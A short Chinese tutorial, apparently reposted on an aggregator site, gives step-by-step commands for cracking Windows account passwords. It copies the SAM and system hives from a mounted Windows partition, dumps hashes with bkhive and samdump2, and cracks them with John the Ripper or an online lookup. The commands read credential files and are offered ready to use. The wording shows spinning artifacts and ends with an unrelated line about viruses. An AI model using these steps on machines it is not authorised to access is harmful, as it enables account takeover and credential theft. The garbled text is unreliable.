linux下破解SAM密碼
發(fā)表時(shí)間:2023-05-27 來(lái)源:明輝站整理相關(guān)軟件相關(guān)文章人氣:
[摘要]用linux啟動(dòng), 并掛載Windows的系統(tǒng)分區(qū)把c:\windows\system32\config\目錄下的SAM和system復(fù)制出來(lái) 也可以用WINPE, dos引導(dǎo)盤, 都可...
用linux啟動(dòng), 并掛載Windows的系統(tǒng)分區(qū)把c:\windows\system32\config\目錄下的SAM和system復(fù)制出來(lái)
也可以用WINPE, dos引導(dǎo)盤, 都可以的, 只要把SAM和system復(fù)制出來(lái)就行
開始破解:
bkhive system keys ——天生keys文件
samdump2 SAM keys > hashes ——用SAM和keys天生hashes
john hashes ——跑hashes
友情提示:
可以直接訪問(wèn) http://www.objectif-securite.ch/en/products.php 在線查詢hash
現(xiàn)在沒(méi)有在linux下, 改天上圖, 下面我文字描述一下
mount -t ntfs /dev/hda1 /mnt/windows
mkdir /home/young001/sam
cp /mnt/windows/WINDOWS\system32\config/SAM /home/young001/sam
cp /mnt/windows/WINDOWS\system32\config/system /home/young001/sam
unount /mnt/windows
cd /home/young001/sam
bkhive system keys
samdump2 SAM keys > hashes
john hashes ——跑hashes
這樣密碼揪出來(lái)了
另外加上一些提示:
好比administrator密碼是123456, 那么他會(huì)在最底下這么顯示
administrator:123456:500:e263f50a6a506be3d494d3d62b4dc666:::看起來(lái)有點(diǎn)像/etc/passwd的內(nèi)容格局, 假如當(dāng)時(shí)沒(méi)有看清晰密碼就清屏了, 或者后來(lái)健忘已經(jīng)破解了的密碼, 可以通過(guò)下面命令查看
john-1.7.2/run/john -show hashes有的時(shí)候密碼處有可能會(huì)顯示幾個(gè)問(wèn)號(hào), 如下
administrator:???456:500:e263f50a6a506be3d494d3d62b4dc666:::這個(gè)時(shí)候可以通過(guò)
john-1.7.2/run/john -show hashes看看密碼是否完整。 假如仍是不完整, 那么可能密碼沒(méi)有完全破解完畢, 可以加–restore 參數(shù)從原來(lái)基礎(chǔ)上繼承破解
john-1.7.2/run/john ——restore hashes
上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。